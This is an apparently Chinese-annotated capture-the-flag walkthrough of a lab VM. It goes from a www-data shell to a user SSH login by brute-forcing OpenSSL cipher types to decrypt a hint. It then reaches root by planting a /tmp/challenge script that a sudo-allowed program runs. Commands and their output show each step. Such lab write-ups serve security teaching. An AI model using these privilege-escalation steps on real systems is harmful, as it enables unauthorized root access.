systemd-private-8740a19667584938855afafb4c1c2a3f-colord.service-YJZ2jh
systemd-private-8740a19667584938855afafb4c1c2a3f-rtkit-daemon.service-famTNO
systemd-private-8740a19667584938855afafb4c1c2a3f-systemd-timesyncd.service-dIYR18
vmware-root
root@ubuntu:/tmp# whoami
whoami
root
root@ubuntu:/home/victor# cd /root
cd /root
root@ubuntu:/root# ls
ls
enc enc.cpp enc.txt key.txt root.txt sql.py t.sh wfuzz wordpress.sql
root@ubuntu:/root# cat key.txt
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
root@ubuntu:/root#内核提权解法完成
OpenSSL 解密
承接上次的结果
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l
<ml/wordpress/wp-content/themes/twentynineteen$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc免密码root执行 /home/saket/enc不知道enc是干啥的,先执行一下看看
www-data@ubuntu:/home/saket$ ls
ls
enc
password.txt
user.txt
www-data@ubuntu:/home/saket$ cat password.txt
cat password.txt
follow_the_ippsec
www-data@ubuntu:/home/saket$ ./enc
./enc
enter password:要求输入密码,没有密码,找一找密码文件
www-data@ubuntu:/home/saket$ find / -name '*pass*' 2>/dev/null | sort | less找到一个文件
/opt/backup/server_database/backup_pass读取文件信息
www-data@ubuntu:/opt/backup$ cd server_database
cd server_database
www-data@ubuntu:/opt/backup/server_database$ ls
ls
backup_pass
{hello.8}
www-data@ubuntu:/opt/backup/server_database$ ls -liah
ls -liah
total 12K
414038 drwxr-xr-x 2 root root 4.0K Aug 30 2019 .
414037 drwxr-xr-x 3 root root 4.0K Aug 30 2019 ..
414108 -rw-r--r-- 1 root root 75 Aug 30 2019 backup_pass
414042 -rw-r--r-- 1 root root 0 Aug 30 2019 {hello.8}
www-data@ubuntu:/opt/backup/server_database$ cat backup_pass
cat backup_pass
your password for backup_database file enc is
"backup_password"
Enjoy!
www-data@ubuntu:/opt/backup/server_database$获取到enc执行密码`backup_password`,执行enc文件
www-data@ubuntu:/opt/backup/server_database$ sudo /home/saket/enc
sudo /home/saket/enc
enter password: backup_password
good
www-data@ubuntu:/tmp$ cd /home/saket/
cd /home/saket/
www-data@ubuntu:/home/saket$ ls
ls
enc
enc.txt
key.txt
password.txt
user.txt
www-data@ubuntu:/home/saket$发现enc同级目录下,多了两个文件key.txt、enc.txt
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
www-data@ubuntu:/home/saket$ cat key.txt
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.根据提示信息将`ippsec`,进行md5加密并转为16进制并去除空格和换行符
┌──(root㉿Kali)-[~/nmapscan]
└─# echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}'| tr -d '\n' | od -A n -t x1 | tr -d '\n' | tr -d ' '
3336366137346362336339353964653137643631646233303539316333396431此时获得一个密文和一个16进制的key,可以想到用OpenSSL解密,但是不知道加密类型,编写脚本进行遍历加密类型
首先将加密类型放置到一个文件中
┌──(root㉿Kali)-[~/nmapscan]
└─# cat CipherTypeRaw
blake2b512 blake2s256 md4 md5
rmd160 sha1 sha224 sha256
sha3-224 sha3-256 sha3-384 sha3-512
sha384 sha512 sha512-224 sha512-256
shake128 shake256 sm3
aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb
aes-256-cbc aes-256-ecb aria-128-cbc aria-128-cfb
aria-128-cfb1 aria-128-cfb8 aria-128-ctr aria-128-ecb
aria-128-ofb aria-192-cbc aria-192-cfb aria-192-cfb1
aria-192-cfb8 aria-192-ctr aria-192-ecb aria-192-ofb
aria-256-cbc aria-256-cfb aria-256-cfb1 aria-256-cfb8
aria-256-ctr aria-256-ecb aria-256-ofb base64
bf bf-cbc bf-cfb bf-ecb
bf-ofb camellia-128-cbc camellia-128-ecb camellia-192-cbc
camellia-192-ecb camellia-256-cbc camellia-256-ecb cast
cast-cbc cast5-cbc cast5-cfb cast5-ecb
cast5-ofb des des-cbc des-cfb
des-ecb des-ede des-ede-cbc des-ede-cfb
des-ede-ofb des-ede3 des-ede3-cbc des-ede3-cfb
des-ede3-ofb des-ofb des3 desx
rc2 rc2-40-cbc rc2-64-cbc rc2-cbc
rc2-cfb rc2-ecb rc2-ofb rc4
rc4-40 seed seed-cbc seed-cfb
seed-ecb seed-ofb sm4-cbc sm4-cfb
sm4-ctr sm4-ecb sm4-ofb zlib
zstd替换空格为换行符并排序取唯一
┌──(root㉿Kali)-[~/nmapscan]
└─# awk '{gsub(/ /,"\n");print}' CipherTypeRaw | sort | uniq > CipherTypes编写解密脚本
┌──(root㉿Kali)-[~/nmapscan]
└─# for Cipher in $(cat CipherTypes);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431;done提取解密信息
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor.尝试登录SSH
┌──(root㉿Kali)-[~]
└─# ssh saket@192.168.248.134
saket@192.168.248.134's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
670 packages can be updated.
510 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Sat Aug 31 05:31:31 2019
$登录成功
提权枚举
$ whomai
-sh: 1: whomai: not found
$ whoami
saket
$ id
uid=1001(saket) gid=1001(saket) groups=1001(saket)
$ sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:eb:a5:7c brd ff:ff:ff:ff:ff:ff
inet 192.168.248.134/24 brd 192.168.248.255 scope global dynamic ens33
valid_lft 1706sec preferred_lft 1706sec
inet6 fe80::57e8:dc54:3bcd:712a/64 scope link
valid_lft forever preferred_lft forever
$ ls
enc enc.txt key.txt password.txt user.txt提示信息
(root) NOPASSWD:/home/victor/undefeated_victor为了提升终端交互性进行终端升级
$ python -c "import pty;pty.spawn('/bin/bash');"
saket@ubuntu:~$根据提示执行`/home/victor/undefeated_victor`
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
saket@ubuntu:~$提取有信息,猜测undefeated_victor会执行`/tmp/challenge`
/tmp/challenge: not found创建提权脚本
saket@ubuntu:/tmp$ echo '#!/bin/bash' > challenge
saket@ubuntu:/tmp$ echo '/bin/bash' >> challenge
saket@ubuntu:/tmp$ cat challenge
#!/bin/bash
/bin/bash执行`/home/victor/undefeated_victor`
saket@ubuntu:/tmp$ chmod +x challenge
saket@ubuntu:/tmp$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:/tmp# whoami
root
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:eb:a5:7c brd ff:ff:ff:ff:ff:ff
inet 192.168.248.134/24 brd 192.168.248.255 scope global dynamic ens33
valid_lft 1252sec preferred_lft 1252sec
inet6 fe80::57e8:dc54:3bcd:712a/64 scope link
valid_lft forever preferred_lft forever
root@ubuntu:/root# ls
enc enc.cpp enc.txt key.txt root.txt sql.py t.sh wfuzz wordpress.sql
root@ubuntu:/root# cat root.txt
b2b17036da1de94cfb024540a8e7075a
root@ubuntu:/root#OpenSSL 解法结束
没有回复内容